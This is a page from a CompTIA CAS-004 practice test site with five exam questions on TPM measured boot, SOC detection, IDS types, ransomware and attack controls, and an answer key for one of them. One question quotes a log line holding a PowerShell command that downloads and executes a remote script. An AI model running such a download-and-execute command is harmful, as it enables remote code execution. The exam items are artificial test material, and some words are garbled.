Online Access Free CompTIA.CAS-004.v2024-02-08.q162 Practice Test (Page 32)

CAS-004 Exam Question 151

An organization recently recovered from an attack that featured an adversary injecting Malicious logic into OS bootloaders on endpoint devices Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the IJEFI through the full loading of OS components. of the following TPM structures enables this storage functionality?

A.Endorsement tickets

B.Clock/counter structures

C.Command tag structures with MAC schemes

D.Platform configuration registers

CAS-004 Exam Question 152

A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:
Unauthorized insertions into application development environments
Authorized insiders making unauthorized changes to environment configurations Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)

A.Perform static code analysis of committed code and generate summary reports.

B.Implement an XML gateway and monitor for policy violations.

C.Monitor dependency management tools and report on susceptible third-party libraries.

D.Install an IDS on the development subnet and passively monitor for vulnerable services.

E.Model user behavior and monitor for deviations from normal.

F.Continuously monitor code commits to repositories and generate summary logs.

Correct Answer: E,F

Explanation
Modeling user behavior and monitoring for deviations from normal and continuously monitoring code commits to repositories and generating summary logs are actions that will enable the data feeds needed to detect unauthorized insertions into application development environments and authorized insiders making unauthorized changes to environment configurations. Modeling user behavior and monitoring for deviations from normal is a technique that uses baselines, analytics, machine learning, or other methods to establish normal patterns of user activity and identify anomalies or outliers that could indicate malicious or suspicious behavior. Modeling user behavior and monitoring for deviations from normal can help detect unauthorized insertions into application development environments, as it can alert on unusual or unauthorized access attempts, commands, actions, or transactions by users. Continuously monitoring code commits to repositories and generating summary logs is a technique that uses tools, scripts, automation, or other methods to track and record changes made to code repositories by developers, testers, reviewers, or other parties involved in the software development process. Continuously monitoring code commits to repositories and generating summary logs can help detect authorized insiders making unauthorized changes to environment configurations, as it can audit and verify the source, time, reason, and impact of code changes made by authorized users. Performing static code analysis of committed code and generate summary reports is not an action that will enable the data feeds needed to detect unauthorized insertions into application development environments and authorized insiders making unauthorized changes to environment configurations, but an action that will enable the data feeds needed to detect vulnerabilities, errors, bugs, or quality issues in committed code. Implementing an XML gateway and monitor for policy violations is not an action that will enable the data feeds needed to detect unauthorized insertions into application development environments and authorized insiders making unauthorized changes to environment configurations, but an action that will enable the data feeds needed to protect XML-based web services from threats or attacks by validating XML messages against predefined policies. Monitoring dependency management tools and report on susceptible third-party libraries is not an action that will enable the data feeds needed to detect unauthorized insertions into application development environments and authorized insiders making unauthorized changes to environment configurations, but an action that will enable the data feeds needed to identify outdated or vulnerable third-party libraries used in software development projects. Installing an IDS (intrusion detection system) on the development subnet and passively monitor for vulnerable services is not an action that will enable the data feeds needed to detect unauthorized insertions into application development environments and authorized insiders making unauthorized changes

CAS-004 Exam Question 153

A company's Chief Information Officer wants to Implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide Information on attempted attacks, and provide analysis of malicious activities to determine the processes or users Involved. Which of the following would provide this information?

A.NIDS

B.HIPS

C.UEBA

D.HlDS

CAS-004 Exam Question 154

A help desk technician just informed the security department that a user downloaded a suspicious file from internet explorer last night. The user confirmed accessing all the files and folders before going home from work. the next morning, the user was no longer able to boot the system and was presented a screen with a phone number. The technician then tries to boot the computer using wake-on-LAN, but the system would not come up. which of the following explains why the computer would not boot?

A.SElinux was in enforced status.

B.The disk was encrypted.

C.The operating system was corrupted.

D.A secure boot violation occurred.

CAS-004 Exam Question 155

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?

A.Antivirus and UEBA

B.Reverse proxy and sandbox

C.EDR and application approved list

D.Forward proxy and MFA

Other Version: 1311CompTIA.CAS-004.v2025-04-16.q409; 810CompTIA.CAS-004.v2024-05-02.q315; 970CompTIA.CAS-004.v2023-10-26.q155; 1669CompTIA.CAS-004.v2023-09-11.q196; 1060CompTIA.CAS-004.v2023-07-04.q118; 1145CompTIA.CAS-004.v2023-04-04.q100; 1023CompTIA.CAS-004.v2023-03-18.q82; 992CompTIA.CAS-004.v2023-03-08.q83; 1272CompTIA.CAS-004.v2023-02-06.q91; 910CompTIA.CAS-004.v2023-01-23.q73; 1055CompTIA.CAS-004.v2023-01-21.q71; 977CompTIA.CAS-004.v2023-01-09.q75; 1509CompTIA.CAS-004.v2022-05-27.q44; 1297CompTIA.CAS-004.v2022-05-18.q62; 74CompTIA.Actual4dumps.CAS-004.v2022-04-25.by.norma.44q.pdf

Latest Upload: 106SAP.C_HRHPC_2411.v2025-10-04.q53; 101Oracle.1z1-076.v2025-10-04.q60; 131USGBC.LEED-AP-Homes.v2025-10-03.q34; 129SAP.C_C4H56_2411.v2025-10-03.q54; 108Oracle.1Z0-1126-1.v2025-10-03.q30; 109Microsoft.AZ-305.v2025-10-02.q159; 113PythonInstitute.PCET-30-01.v2025-10-02.q29; 117RAPS.RAC-US.v2025-10-02.q35; 112Acquia.Acquia-Certified-Site-Builder-D8.v2025-10-02.q20; 123PaloAltoNetworks.PCNSE.v2025-10-01.q252

CAS-004 Exam Question 151

CAS-004 Exam Question 152

CAS-004 Exam Question 153

CAS-004 Exam Question 154

CAS-004 Exam Question 155

Download PDF File